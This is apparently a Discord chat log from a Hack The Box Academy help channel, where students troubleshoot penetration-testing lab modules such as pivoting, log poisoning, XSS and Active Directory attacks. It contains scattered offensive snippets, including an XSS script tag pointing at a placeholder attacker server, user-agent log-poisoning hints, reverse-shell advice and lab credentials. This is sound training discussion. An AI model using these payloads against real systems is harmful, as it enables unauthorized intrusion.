#modules
So I'm reading the question very very carefully, it's telling me to create a reverse shell on the machine I'm rdp'd in from dc01?
Because it's saying to create a reverse shell to the machine I'm connected via rdp
Im connected through rdp to ms01
Uh I don't get it
Like the question I don't understand what it's asking me
+1
If it's command injection, please stop posting potential spoilers
Oh its command injection
If someone wants to reach out to discuss, then do so through DM, but no spoilers for modules over Tier 0.
(not reach out to me, but if someone wants to reach out to them)
Password attacks- pass the hash
Sorry, I wasn't responding to you
Did you do that module
I cannot provide advice regarding modules over tier 0
?
Aight don't answer me
I'm HTB staff, I can't share information regarding paid modules
Also, please check the pinned comment here regarding asking questions about modules / sections.
The rdp machine has an internal network with other machines in it. Ur supposed to get a reverse shell on the dc, which u can only get from the rdp machine
wdym +1?
Just check your dms, you were posting spoilers
Like @marsh echo says use sudo and without 4. E.G.
sudo proxychains nmap
I do not understand why the training material (Dynamic Port Forwarding with SSH and SOCKS Tunneling) does not say to use 'sudo'. I wasted hours, again.
alr srry
The only thing with dc01 that I've done is dir \\dc01\julio
But even if only ms01 can connect back to dc01 idk how to execute nc.exe in dc01
for the password reuse/default passwords section of password attacks, I can't get permissions to the shadow file unless I can become root user no? I found some ssh keys in one of the other users' folders. Do I need to crack those? Or would it be better for me to look up what folder MySQL login creds are stored in? Don't give me the answer I just want to know what direction I need to go in so I can google the rest.
nc isnt needed to send a connection back
all u need to do is listen on the rdp machine with nc and wmiexec will do the rest
I don't remember that one exactly, but maybe look for something similar to that file.
I can check my notes in a few.
yes that would be great. a hint in the right direction without giving away the answer would be very much appreciated
Oh wait, if you're in pw Reuse and default maybe try that? Try pwds you already have and known default? Again not at my computer.
dm me the creds
Sorry, but spoilers
Please don't post such information for modules over Tier 0
Glad you got it though
ok so now I am having trouble with the Default passwords / Password Reuse section of password attacks module
my issue is I have this long default creds list and I don't know which one to use
I figured it out
I'm still after assistance on this one, if anyone can provide a pointer please?
In the Pivoting, Tunneling & Port Forwarding > Assessment, one question asks us to identify a user who is "utilizing services in a way that exposes the user's credentials and the network as a whole". What does this mean? Has a service been setup to run with privileged user credentials?
The screen shot contains the question wording and the output from an LSASS dump. Can someone point out how to identify what the question is asking for?
or should I be looking elsewhere, maybe, to know when a service is running as a user?
Look more in through the dump
I'm not picking up on it. The screen shot above is the only place the user in question appears, but I'm not seeing a difference between this user, the other user, and the computer/object's details.
The clear text password is different, but I'm not connecting that with how you "utilize services". I don't know what that means.
I’m not at my pc rn
Dm me tha password
Is it MSSQL? I haven't taken that module yet, but I might suggest stuff covered in the CPTS path's other modules.
To require MSSQL trickery seems like a bit much for a CME module's assessment.
That's a tier 3 though, so a little above my level. 😅
At least I bumped the inquiry.
Check through the other sections of the module, don't get too focused on one service 🙂 @oak lance
If you find yourself at a dead end, it can help to take a step back and see what else you have in front of you.
I need help with the identifying SSRF module. I tried running ffuf but get a ton of open ports back.
it says to Exploit a SSRF vulnerability to identify an internal web application.
what module?
server-side attacks
ffuf shouldn't return a ton of ports, so i would double check that command against what the module teaches
you used the -fr parameter right?
i actually copy and pasted the command from the module
i kind of did what the module showed
i created a file that has a list from 1-10000 then ran the ffuf command that it used to identify the open ports
if you copied and pasted directly from the module that's why it's not working
well its either the target expired and you're not actually hitting it or there's something up with your ffuf command because like i said it shouldn't return a ton of results.
so i'd focus on looking into that.
ok ill go ahead and retry it

ok your right i reran it and only a few ports open this time
dont i just connect using the http://ipaddress:port?
i did it by doing what the module showed
yeah i used burp but I mean why cant I just use http:ipaddress:8000
probably because the browser just processes the request like normal
i used curl for the whole thing
you'll probably get a faster response if you just explain your struggle here instead of asking for a dm
#verify
?
yes
still in Tier 0 modules. Is this the place to ask for advice or another channel?
Yes you can ask questions related to modules here.
I recommend reading the pinned messages first.
it helps to post the link to it, ask some specific questions
Just need some advice or just get others experience. Currently in Information Security Foundations and in Linux Fundamentals module setting up VPS with ParrotOS with Vultr but having some issues with what it says is not enough space. Set up a personal VM with more storage to see if that is the problem but it says the same low storage after the apt update and full-upgrade of parrotOS. Is this normal? I would rather run VPS instead of internal VM on network.
I just read pinned. Thanks for the advice. Fairly new to discord and learning as I go.
you don't need to set up a VPS tbh
also i 100% know your problem
you need to first run the installer
after installing it on the VM/VPS you then need to reboot
afterwards you can install to your hearts content
it also depends how much storage you allocated
i use 80GB for my parrot storage on my vm; and haven't run into any issues with storage space
Ahhh... I see. Well I just destroyed last few VPS so let me rebuild and try this out. I just chose the $12 plan which is very little storage but it is what module recommended.
imo i do more than the suggested
but also
VPS is NOT REQUIRED
i get you would rather do it
and I respect that
but on a personal VM you're always going to be able to access it
rather than relying on the uptime of the server hosting it
Was just trying to get it so I could have more then one instance per day limit and practice as needed.
I have it on personal VM but read in pinned threads not recommended. Thought VPS would be next best thing but I see what you are saying
ltnbob — 12/22/2021 7:55 AM
Keep in mind that if you are connecting to any of HTB's networks from your personal system where you store your personal data there are penetration testers in training on the network. It's strongly advised to use a dedicated VM, computer or Pwnbox when learning with HTB and connecting to our network environments
I know that was a while back but just quickly read pinned and saw that.
It's strongly advised to use a dedicated VM, computer or Pwnbox when learning with HTB and connecting to our network environments
don't see where this is saying not to use a vm?
this is saying not to use your Host System
aka what you use daily
Ok I think I interpreted that wrong. Thanks for clearing that up. Might just do this route instead then.
Deploying VPS now just to try it out and will be moving back to my dedicated VM.
like using a VPS isn't a bad thing really
but it's not really there for those on a tight budget
I was updating VPS and VM at same time and the lag on VPS was so bad.
yeah that's the other thing
took 10mins for VPS and 2 for VM
with VPS you're very much limited to their network and connection
so it's harder to diagnose an issue
in general with security research, such as pentesting, you want to be in control of as many aspects as possible
I see the pros and cons. Also I was using ParrotOS just because of recommendation but used to Ubuntu and Debian 12. Is that ok to use as well instead of ParrotOS
generally it's better to use an OS that's more oriented towards this type of thing
as they'll generally have the tools or libraries in their repos
so Parrot or Kali recommendations?
i prefer parrot due to it being more lightweight on launch than Kali as Kali comes bundled with a lot of pre-running services
but it all comes down to preference
¯_(ツ)_/¯
Perfect.
Anything that helps me learn. Im sure there will be a learning curve involved.
not to mention with distros like Parrot or Kali they'll have some of the more popular tools that are used installed
saving lots of time when it comes to potentially needing to reinstall the OS due to some unforeseen accidents/troubles
i.e. somehow your OS bricking yourself after an update but works fine on a fresh install
there was a kernel panic associated with a driver error in parrotOS when upgrading from 5.x to 6.x because for w/e reason it wasn't properly removing it
oh wow!! I see what you are saying. The easier the better.
whenever something like that happens i backup and transfer my /home/user/* to my host then transfer and unwrap it in the fresh install
Good to know. I'll take that as some good advice that I will definitely keep in mind for future use.
the other big mclargehuge thing; take notes!
Im currently taking notes with Notion. It helps quite a bit for me.
i did the AttackingEnterpriseNetworks blind and because i was lazy at some points in my learning path I had to relookup from the relevant pages some tool syntax
i prefer obsidian myself
Obsidian is new to me. I can look that up as well.
markdown support and plenty of extensions
if it doesn't natively do that: There's a plugin for that

or there's a plugin to do a native function better
i.e. there's a templater plugin that makes the native template plugin look like a joke
as it allows you to set the filename
and some other fun stuff
cannot wait until I get to that point
for the most part for notes you don't need templates
Ok... went through installer and even setup new user via bash and apt update and upgrade with same low storage notification. Reboot system and it sends me to install menu again for a clean install. Weird!!!
Tried to reboot a couple of time with same outcome of clean install option.
I am doing the foot-printing module, and am up to the FTP section, I have got the flag, but the first question at the end of this asks for the banner, I am unsure what it wants. the question asks for the whole line, so I tried copying in the whole line. and have tried all the different variations I can think of, but none of them are right. can anyone give me advice on what specifically the question is looking for?
Use templates only for the ease of organization. Other then that, probably wouldn't need the template
did you remove any trailing spaces?
yes
make sure not to include the status code
That was my issue, thank you
a lot of services provide a Status Code alongside the delivered message or just before the output of something
Thank you for the help
if you want to dive into different status codes you can always google "<Service> Status Codes"
they all follow a general similar structure though
2xx == positive message
3xx == resource moved
4xx == resource error of some form
5xx == server error of some form
some status codes for services even indicate an even more deeper meaning into the second digit
Hello all,
i have been stuck on attacking trust for like 3 days now i can't solve it the question number 2 Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt" from question 1 i abused acl to get admin on the DC and from DC and DC03 there is forest trust i tried sid history injection but its work can any one done this module help
If there's a forest trust can you not log into the DC03 or are you saying you only have localadministrator on DC01
please don't share any screenshots or spoiler info for modules above tier 0
someone that's done this can likely point you in the right direction though 
it would really help if you said what module/section you're on.
im stuck on skill assessment i tried every thing from the course it did not work
i'm not seeing an attacking trust module in the search
Active Directory Trust Attacks
i feel like its a wasted 500 cube
nah looking at the overview it looks promising
me too but the labs setuped for skill assessment so had for learning phase
?
its a challenge for sure
that's how all the modules are set up to provide a learning curve for the skill assessment
so that you are better prepared to tackle it
You finished ?
i haven't done the skill assessment yet or i could give you some advice
i'm sure the method is provided in the module, i'd go through each section again and just try everything that's in the module
i tried all of them
remember sometimes tools like bloodhound/adalanche can't see everything and you just have to manually enumerate, if you didn't do it manually
some of them require python on machine i eliminate them since i cant install python on the dc
well its probably not that then
i can tell you every time i thought there was something wrong with the module or i had to reach outside the module contents to move forward i was wrong
probably don't want to talk about specifics about the skill assessment
i got it
ya sorry maybe someone who did it can provide you some guidance but like i said i haven't done the SA yet
i hope so
I recommend looking at Ippsec's playlist on using Ansible to automate rebuilding a Parrot install https://www.youtube.com/playlist?list=PLidcsTyj9JXJVIFqyHBHzrRYKPpZYFjM8
you're assuming i care about that kind of thing
it doesn't happen often enough for me to need to automate it
I am. It's also just throwing it in here if anyone else was interested in building machines. I think he says that he builds new for every client but I'm yet to do this for work, so I'm not yet worried about leaking info between clients.
well yeah for client -- client basis you want a clean machine
as some clients may want an exported image of your machine
thank you broo
```
sudo proxychains xfreerdp /v:172.16.5.129 /u:user /p:pass
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.16.5.129:3389 <--socket error or timeout!
[10:30:33:158] [10308:10310] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:30:33:159] [10308:10310] [ERROR][com.freerdp.core] - failed to connect to 172.16.5.129
```
here why its not running but??
anyone face same problem in Dynamic Port Forwarding with SSH and SOCKS Tunneling
?
whats the proxy chains config?
i mean, the line where you specify the socks connection
like socks5 127.0.0.1 9050
Hey guys
hey
hey, still need help?
9090
ya bro its not running
whats your SSH command?
Okayyy
ssh -D 9090 ubuntu@10.129.145.208
you trying to pivot through SSH?
yes
the ssh command is wrong
Dynamic Port Forwarding with SSH and SOCKS Tunneling this module
its given in the theory part
@vagrant sentinel instead of trying to cheat your way around what went wrong, speak to your tutor.
sometimes the only payload we need is a chocolate and an apology
Hahaha
damn ur right, then i dunno, but try using -L
as you can see nmap is working
bro thats for port forwarding and i am doing pivot
i gotta redo the module damn
anyways, try connecting with netcat first
check if the remote port is open, just to discard possibilities
everything working except this xfreerdp command
oh wait
does the nmap shows port 3389 as open?
```
sudo proxychains nc -vz 172.16.5.129 3389
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.16.5.129:3389 <--socket error or timeout!
172.16.5.129 [172.16.5.129] 3389 (ms-wbt-server) : Connection refused
```
you have the wrong ip
```
sudo proxychains nc -vz 172.16.5.129 80
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.16.5.129:80 ... OK
172.16.5.129 [172.16.5.129] 80 (http) open : Operation now in progress
```
is that the skill assessment?
?? 80 is showing open
yes
read the question again and you will find the correct ip for the rdp session
yeah rdp didnt work for me either, i just used winrm
unless i did something wrong
take a 2-3 minute pause and try again
xfreerdp tries to connect to the remote windows machine through port 3389 but its closed, try restarting your target
its been 2 days
dayum
i did bro
the 3 times i did it rdp didnt work either
again, read the question
nothing wrong with the target, there is no need to speculate what he needs to do and if the target is broken
Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
the ip you are trying is wrong
.19...
no way
typo 
bruh ?? but the ip showing in ifconfig is other
the .129 is likely the internal IP of the host you ssh into
that's the ifconfig of the host you are going into
it's another NIC that allows access to the internal network
which 172.16.5.19 is on
you can revisit the networking module
wait why didnt rdp work for me tho 😭
yes; systems can have multiple NICs/Network Interfaces
did you also try rdp to .129?
¯_(ツ)_/¯

is that the pivot host ip?
@uncut ocean did you manage to do it?
but the main idea of this module is to pivot into the another machine internally and we have to check the other ip with ifconfig and here i get that ip and i ping it its working so according to the module i have to rdp into that part bec i am going to pivot that ip which is showing in the ifconfig
guys i love this server, i could stay awake all night just for the fun of talking with yall
here you're directly given the internal IP
you got the concept wrong
also the ifconfig is NOT showing another host on the system
it gives insight onto other networks the host potentially has access to
gotta ping sweep
my advice would be to revisit the networking module and the first sections of the pivoting module
in this case the ip is directly given, but yes ping sweep
okk i am going to check this first
it's 1000x better if you can use a pivoting tool that allows ICMP; because then you can use fping 
what is the command of timeout in rdp??
xfreerdp --help
/timeout:
Thankyou guys for clearing my doubts
reading is the key to success
how to lockpick success
ya but like in real world scenario i get into host and i have to move further so how can i check which host the compromised system can communicate with to pivot?
¯_(ツ)_/¯
pinging i think
I believe the module provides a ping sweep command
which varies on host
but the general format is just supplying a loop command that loops through 1..255 and sends a single ping and looks for a response using the shell language's command that can do that
let him read and finish the module and he will understand, don't push him 10 steps forward
i.e. findstr/select-string/grep
okay a bash script to ping a subnet
it's not required for this question
just focus on what's given to you first
local enumeration for config files containing other ips is also a possibility, since sometimes firewalls block ping requests
that's beyond the scope of the module
stills good to know
alr
what's important to answer the question is directly told by the question
Another day
Hey
Hi
Hey
Wht is this server Abt
Can anyone tell me ? I’m new here
What’s that ?

hey i need help with with finding the path to mail in a htb workshop
when i try the "mail" command it cannot be found
how do i fix this?
from which module and section is that?
check the environment variables of the user
thank you
🌞
hey, i have issue on module 23 section 252 for the "Try to use a different technique to gain RCE and read the flag at / "
I've been up for 1 hour ahaha
it helps if you use the actual module and section name
its File Inclusion at section Log Poisoning
i follow all the command for this question but i dont have result
I stopped being a .... and went to gym but I'm going to bed after this its getting late
You're right, physical activity is important for the body (even though I haven't done anything for 6 months now because of the CPTS).
could someone guide me with xss skill assessment. i got the [200] GET /myscript.js followed by a closing.
i include the script in the comment and the website textbox
in the language parameter you target this file ? /var/log/apache2/access.log
do you replay the request in Repeater and do you attack the user agent?
to see the result you need to reset the user Agent inital Mozilla/ ....
I advise you to create a php server and to put an xss in all the fields with the name of the field to know which is the vulnerable field.
"><script src=YOURSERVER:PORT/name_field></script>
HELLO WORLD
Has anyone here done the dacl2 module ? spn-jacking first question, I feel like I don't understand the question, even read the "answer" provided in the gold annual writeup but it's the same as i did? https://academy.hackthebox.com/module/255/section/2911
i access it
yes and after when a go to "access.log?cmd=id" i dont have a result
Wouldn’t it be &
iirc just find SPNs without a corresponding computer object
U changed ur user agent too?
yes
Send another request with the user agent and try again
Yup, that's what I found but no variation on the computer name seems to work
first i send normal request after i send request with payload in user agent and after i send request access.log with command but dont work
Have you solved it yet?
Are u able to see the logs without the cmd?
Yup, I reset the box and vpn
hmm I have the name but didn't submit the answer, and it's not working for me either 
yes
May I DM you to compare ? 😄
sure
Dm me a screenshot
@limber surge we can exchange here for xss i can give you hints ( i think i gave you an excellent hint ) we are not allowed to exchange private answer information
maybe the format and pay attention to the space between id and HTTP/1.1 and as I said don't forget to put the user agent back to normal
I put the absolute path of access.log
hey in the overview module in privesc section . it says if we have shell on a user then we can put our ssh public key in authorized hosts i dont see any use of this bcz we already have access to the user with reverse shell and can upgrade shell then why???
reverse shells aren't really persistent
we need to trigger the shell, but what if there is a better backdoor?
yeah but how it helped in privesc
the authorized_key file will not accepts any public key added by another user
It will privesc if you could write to root user’s authorised key file
Otherwise it’s to ensure you can login whenever if you lose the shell
guys, I have two question? (Please no hate, I'm a noobie) From Information Security Foundations there is a course called Setting up and under Linux section there is VM Setup, should I also create a VM with ParrotOS? Since we already have a My Workstation with ParrotOS already?
if you would like to have a local vm, then go for it
otherwise you can use the workstation
Thank you!
Hello, I managed to do it in two stages. The first stage was to compile on a virtual machine with Ubuntu 2.40 (the same GLIBC version as the pivot machine). Then, I manually installed the missing SSL on the HTB pivot machine. With these two parts, it should give you an idea of how to proceed. 😉
ok my bad, this is a very good exercise, it forced me to think.
Hey in the attacking splunk lab they say we need a bat file that will run when the app is deployed and execute the power shell one line
I've modified a .conf file and put in run.ps1 inside it other than that i also modified the powershell script with attacking ip and port now what all do i have to do further
That sounds about right. After that it should just be uploading it and catching the shell.
That should all be in your bat file.
If you don't understand what that is I would do a little research to understand what it is you are doing, unless it is explained in that section.
No it isnt that properly explained
I understood up to that part where u put ur payload into that bin file then we modify this config file to make splunk run that payload
But where does this echo command come in that i didnt see there or i didnt understand that part alone
i am at the second windows priv escalation skill assessment...and i cannot find the damn left behind cleartext privs....
i used:
```
Get-ChildItem -Path "C:\Path\To\Search" -Recurse -Include *.config, *.xml, *.txt |
    Where-Object { $_.FullName -notmatch '^C:\\Windows\\' }  # -notmatch takes a regex, so backslashes are escaped
```
You can DM what you have done up to this point.
I uploaded it but shell not received in listener
Double check your stuff, make sure the machine is still running, and even reset it if you have verified everything is correct and not working.
The echo command
where is this entered
Send me a DM
hello, im in "Network Enumeration with Nmap", in "Host Discovery". the question is - " Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result."?
i tried to read the hint, and still didnt understand, can help me?
What is the last paragraph in the reading material discussing?
"identify its system" could be read as "identify its OS"
when i did the privesc questions and in the second que i executed the command find / -readable i didnt get the /root path in that maybe i cant readanything in /root but i can in .ssh and it didnt show up .
why
Can you even do a directory listing in /root/?
Yes. So you're saying you can't ls /root/, but you can ls /root/.ssh/ ?
yeah
If so, yes, that's the reason. find is looking at each directory discovered and observing the permissions. If it can't list anything in /root/ it can't know there's a .ssh directory.
it (or you) could only guess what directories are there and hope they not only exist, but you have some kind of permission for them.
bcz of it i thought of another things to escalate
hey guys!
https://academy.hackthebox.com/module/158/section/1434
I am following exactly what is being taught in this section but, i cannot browse the ip via proxychains. Am i missing anything or overlooking?
nope i followed the steps and it works so you're probbaly missing something
i started the server, ssh'ed with -D 9050 and connected via client script, now when I open the ip via proxychains, it won't load at all.
please delete this message if I am giving too much info
proxychains4.cfg - has the 127.1 9050
should I change the file name to proxychains.conf instead?
FYI - I am using my personal machine
no need to change proxychains config file name, just do it like the module says
I followed exactly and tried atleast 3 times, still no luck on opening the IP
I also tried opening both discoverable IPs (ping-sweep for-loop script)
is the web running on non-default port?
do I have to perform the nmap for the IP?
you can try following the instructions exactly in pwnbox for a sanity check. proxychains4.cfg sounds weird, what OS are you using?
tried resetting the target, tried on pwn box too
kali with zsh
MODULE: Advanced SQL Injections
SECTION: Reading and Writing Files
Could someone tell me what am I supposed to do to get the flag? I already completed the task.
I don't know what you're on about with proxychains4.cfg. That's not in the guide at all.
and it's not a kali thing
I'll try renaming once
keep in mind ping won't work through proxychains
performed ping-sweep scan from jump host (ubuntu)
ok, that's cool, but not being able to ping through proxychains threw me off is all I'm saying. full tcp connections only.
I did not perform any scan, as soon as I discovered the IP (same as shown in the example explanation), browsed through proxychains
renaming to proxychains.conf worked
Weird. I can't imagine how you got a file called proxychains4.cfg. ¯_(ツ)_/¯
The file you should be editing is usually found at: /etc/proxychains.conf
I never touched until this module/section
Create a file in that directory and after you do it, access that URL to get the flag
Ahh got it! thanks. Was expecting the data in the filesystem 😛
this
Yes, and below it is a sentence that suggests you can identify a system [OS] by the TTL.
On the far right you can see the ttl= field, but the value is obscured by the box's size. You need to scroll.
thx!
Is hacking largely about squinting your eyes and scrutinizing indecipherable gibberish in the computer outputs?
Not very hollywood.
Who said Hollywood was right?
how do i find the index number of the sudoers file? I've been stuck on this for 30 min
Hello everyone! I'm stuck on Introduction to Windows Evasion Techniques SA1. I have two different but similar developed trojans, I scanned them with both the ThreadCheck tool and YARA with the crime_wannacry.yar and apt 17 rules, and a number of other rules that I found on the Internet for msf and microshell. My trojans are not detected, they were checked for virus total, there were 7 static ML triggers. If anyone has completed this and can advise what the problem is, please write to me in DM, I've been trying to solve this task for a week now
I am having an issue with this question Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
man ls and look for the word 'index'
What issue are you having also there's a forum that answers this question if you google, and it explains the commands
ok
When going through the academy paths how much is it recommended to mix up the structured work with ctf boxes on the htb site? As it drops you into situations that are closer to scenarios we may come across? Was just a thought the last 2 questions in the footprinting imap/pop3 had me stuck for a bit and thought I’d like more scenarios to help understand more
Any recommendations for OSINT geolocation tools?
There's an OSINT module but geolocation doesn't sound like a passive OSINT recon
There is a corporate OSINT module though
You can do reverse image searches through google which can help get rough locations
Isn’t that less effective on more recent images/devices?
Oh ok, I remember studying a bit on it a while ago, the amount of info you can get from an image is scary
Even then there are just people who can identify you by the color of grass
Or the tree
Plenty of correlational data
Yeah or location of the bin in reference to a door 😂
Have you seen rainbolt's geoguesser games?
Yes I have, it’s interestingly fun
I also played a game can’t remember the site but they show you a picture and you have to drop a random pin and closest to it gets the points I played it with my work team
Hi all!
Please tell me, I'm currently going through the Linux Fundamentals module, and now I'm in the Network Configuration part. I'm trying to Configure SELinux to allow a single user to access a specific network service but deny access to all others. I made 2 SELinux policy modules - one allows a user in the staff_t group to connect to the SSH service, and the user_t and unconfined_t groups cannot connect via ssh. But for some reason all groups can still use SSH. Please tell me where to dig?
You don't have to configure SELinux that's heavily optional
Genuinely curious as to what I'm doing wrong here.
Proxychains refuses to connect RDP (left) through the SSH tunnel (right). Module: Pivoting; Section: Dynamic SSH/SOCKS
Anyone?
Still nothing; trying proxychains with sudo next
error: XDG_RUNTIME_DIR is invalid or not set in the environment.
Not KRDC?
I kinda purged a lot of proxychains info since switching to ligolo-ng
I don't recall having many issues with this
But I believe the question states authenticating to
Not necessarily rdp
Unless I'm misremembering
could be nothing, but can you access the host via psexec or powershell remoting and check if HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin is set to 1 ?
Well that doesn't sound like the issue tbh
If it was he'd still connect but then be shown the message regarding restricted admin
yeah I usually get a different error when the registry key is set and I try to rdp with non rid-500 account, but who knows
victor is not the admin on the box, so that wouldn't make a difference.
it's the other way around, if that registry key is set only built in RID-500 Administrator account can log in via RDP, any other user cannot regardless of their privileges
but it's prob not the issue as marcie said, this concept is later introduced in the AD module IIRC
No, it's Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
Wait is this the socksoverrdp section?
The ssh -D section.
Weird that it's giving a no route to host error though
Change vpn regions and respawn the target
I suggest reaching out to support
Yes, I know. What's especially weird about this is that using nmap -PR over proxychains was causing the 172.16.5.x IP addresses to resolve to some weird qarestr.sub-172-16-5-*.myvzw.com domains, so it might be an ISP issue since I do use Verizon 5G Home Internet.
No, it's a 192.168.0.x network
So it shouldn't affect anything
Try just restarting your vm
Is your vm in a 172 network?
I'm not using a VM. I'm using Garuda Linux + pacman -S blackarch on a physical host.
Going to try this module over PwnBox in the meantime.
G0b isn't support
Reach out to support via the bubble on the page
G0b is actually CTO iirc
Well it works fine in PwnBox. Yeah, not sure what the problem is from my end.
Hello guys I’m an soc analyst but I’m really interested in penetration testing can anyone help me in how to start pentesting?
@bright pivot consider filters. But you should be able to figure it out
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
with fs -900?
Whatever size is most common that you see
I have the flag for the XPath - Blind Exploitation on injection attacks module but it wont let me submit 😦
can people verify that the flag should be a 33 character length?
The flag should be in the format ||HTB{....}||
alr, i found my mistake. Thanks guys!
@old oasis can i dm, or @acoustic owl can i dm?
im struggling to locate the flag if you get what i mean
but i dont want to post my path here
I cant ssh to the server
have you tried asking the server nicely?
Yes
no route to host
I am using vm instance
is that the target for the question you're on? you said vm instance, you mean pwnbox?
or your own vm
if your own vm, are you connected to the vpn?
Pwnbox
Yes
I tried connecting from my own vm using vpn it showed the same error i tried pwnbox still shows the same error
are you able to ping the machine?
Yep shows host is unreachable
Are there known issues with xfreerdp sessions to windows vms dropping frequently? Sessions are failing after less than five minutes. Very frustrating.
Should i reset the target?
well thats why you can't connect to the ssh
i dont think that will make any difference, its probably about your connection with the VPN :/
I am getting the same problem in pwnbox too
that's odd
use tcp vpn
do you have the vpn running on your host machine/vm?
if so turn that off
Aight
I'm currently using the academy-regular.ovpn file with openvpn to connect. Are you suggesting using a different means of connecting to the vpn?
there's a tcp and udp download option
for the vpn config
Where can I find that? I just followed the link in the course, which doesn't differentiate.
scroll up
where it says "choose vpn location"
...and there it is. Thank you!
rdp and udp aren't a good combo
as rdp generally wants a connection-oriented protocol
Makes sense.
other than that changing the region altogether can also just fix it ™️
Cool. Good data. Thanks again!
Well, just disconnected again.
Might try changing region if it persists.
is pwnbox ever 100% needed?
only in a handful of cases like where it explicitly asks for a path in pwnbox
or where for whatever reason it just works ™️ in pwnbox
Hello
a
the hints should be visible after youve solved it yk, maybe i just wanna know they got to say 😢
Hello
refresh the page... hints appear to be visible for me when I revisit old modules I've completed.
Anyone for a nudge on the RCE part of the Advanced SQL Injections SA?
I got a Python script that executes a query to the DB, which is validated by changing and retrieving some of the data in the DB.
Also tested the RCE in other Section with valid results.
someone can refresh my memory please, i can't remember the name of the tool that allows you to generate a list of users from a username for password pulverisation i can't remember which section it was given in the cpts
Login brute forcing is the module. Username anarchy is the tool.
you're a boss thanks man
ooo thank you sir
Hi
I'm on skills assessment for shells and payload and having a little trouble enumerating the password and username for the apache tomcat website on host 1
Good day lords hackers, I want to ask: is there a way to pause academy subscription? I have been busy for the past 2 months, I can’t do any module and my subscription is running out. Is there a way to put a pause on it?
Not that I'm aware of and have never heard of anyone obtaining extensions for their annual sub. Reach out to support on the site.
anyone have any idea 😅
yea they are check this out
Can’t send spoilers bro
As u can see I put the credentials the first option and it still didnt work
do u have any tips
Why did u have a wordlist?
I'd take it to DM if you want to nudge 🙂
Ye
thx
ill also mention when i use -o flag to output to a file it comes up empty so i had to grep > file.txt to save the output
sorry, may I dm u as well 😅
No, sorry - I can't directly advise
T2 module, please don't share screenshots like that Sedan
okay i blocked the answer out but my bad
ok could u give me some tips here if possible
Hi
I'm on skills assessment for shells and payload and having a little trouble enumerating the password and username for the apache tomcat website on host 1. Is it possible I have to change the wordlist?
I completed the module a long time ago, but maybe I can help. You can send me a DM
thanks
@muted jacinth Hey man can i ask you pls
will do, thanks!
Attacking web applications with Ffuf:
Parameter fuzzing
Question: Using what you learned in this section, run a parameter fuzzing scan on this page. What is the parameter accepted by this webpage?
I've been trying this for a while but it's taking too long, could anyone give a hint here
ffuf -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:44121/admin/admin.php?FUZZ=key
Just read the challenge description again, try to understand it and then do research on API responses... you'll basically need to analyse the JS code first
Did you filter correctly?
What do I filter with?
What were u filtering with before?
I didn't use any filters, how do I figure out what to filter for?
Am I missing something?
I'm actually lost, what is the common occurring size?
I dont get any results in the first place
to even make a filter based on content size
Did u wait for it to complete?
oh lol I had to restart the machine it's working now thanks 🙂
Up to the first socat section of the pivoting module — why is it saying "Connection refused" when I literally copy and paste the command from the module onto the pivot box?
that means the port is closed
Which port? 8443 on the target or 8080 on the pivot?
the port on the server you're attempting to connect to on that port
Well I'm trying to pivot, not connect to a port, so I'm not sure what you're talking about.
yes and one computer is the server and one is the client in this case
the server is the host that is listening for the connection
it tells you exactly which IP is refusing the connection right there in your screen shot
Which is, again, what? 10.129.121.16 or 172.16.5.19?
read the line that says "connection refused" and try to find an ip address
where is the channel for help box lab ? i've got a problem with bloodhound ... I launch toput correctly but the zip file does not extract and remains at 0%.
so it would seem the target is not listening on that port, or the port is blocked for some reason. some obvious things when it's not listening would be that the server isn't running the app/service that is supposed to listen on that port, or maybe a firewall is blocking traffic.
there are multiple versions of sharphound/bloodhound etc. and they are incompatible with each other. whenever i've uploaded to BH and it was 0 bytes it was because i was using the wrong version. i may also recall one time because i had the .zip with root only permissions and wasn't running bh as root. so i'd check those two things.
ah I thought he had a problem thank you
Thank you ! 🙏
Update on this: so I was able to get proxychains to work by running ssh htb-ac-<ID>@htb-<KEY>.htb-cloud.com "cat /etc/proxychains.conf" | sudo tee /etc/proxychains.conf to effectively clone the proxychains settings off of PwnBox onto my personal host. Not sure what else needed to be set though besides what was mentioned in the module.
In the module: "Learning Process" section:"Documentation" There are reference to a tool called "Flameshot".
After downloading the .msi version from the Github repo and running it in Virustotal I get somewhat mixed results.
It passes the scan but community responses say it's most likely malware. Anyone else having encountered this? 🙂
yeah probably just download it from their official website, flameshot.org. or use sharex.
0A9C7D8E2AD89BB46D998B095235EB03 is the md5 hash i got from their website, 0 detections on vt
Alas the same response, but I'll detonate it in a Sandbox or use REMnux to analyse it.
Yes 0 detections but a bunch of community warnings. I'll investigate it a bit more in a Sandbox. Thanks for the help! 🙂
Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'
post web request, can someone help me? i type the flag in this box but it marks it as wrong
Try to refresh the page and resubmit it and if that doesn't work, reset the machine and try to submit that flag again.
ok thanks
can i use the same commands as kali linux in windows powershell
You don't have to redo it, just try the flag you got again and see if it accepts it.
ok
curl syntax in windows is gonna be different, especially powershell
